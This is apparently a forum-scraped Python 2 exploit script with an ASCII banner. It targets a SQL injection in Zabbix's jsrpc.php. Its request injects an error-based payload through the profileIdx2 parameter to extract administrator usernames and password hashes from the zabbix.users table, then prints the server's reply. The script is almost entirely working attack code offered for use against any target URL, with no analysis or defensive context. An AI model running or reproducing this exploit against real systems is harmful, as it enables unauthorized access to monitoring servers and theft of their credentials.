可我浪费着我寒冷的年华
#/usr/bin/python#
*-*coding=utf-8*-*
import urllib
logo = '''\n
_____ _ _ _ _____ _
|__/__ _| |__ | |__ (_)__|___| ____| | __
/ // _` | '_ \| '_ \| \ \/ / |_ | | | |/ __| |/ /
/ /| (_| | |_) | |_) | |><|_|| |_| | (__| <
/____\__,_|_.__/|_.__/|_/_/\_\_| \__,_|\___|_|\_\
\n usage:exploit(target url)
\n******************************
'''
print logo
def exploit(url):
url1 = url + "/zabbix/jsrpc.php?sid=7ec992469a75a2c8&type=&method=screen.get&mode=&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=2%20and%20(select%201%20from%20(select%20count(*),concat((select(select%20concat(cast(concat(alias,0x7e,passwd,0x7e)%20as%20char),0x7e))%20from%20zabbix.users%20LIMIT%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color=1"
page = urllib.urlopen(url1)
htmlcode = page.read()
print htmlcode
页:
[1]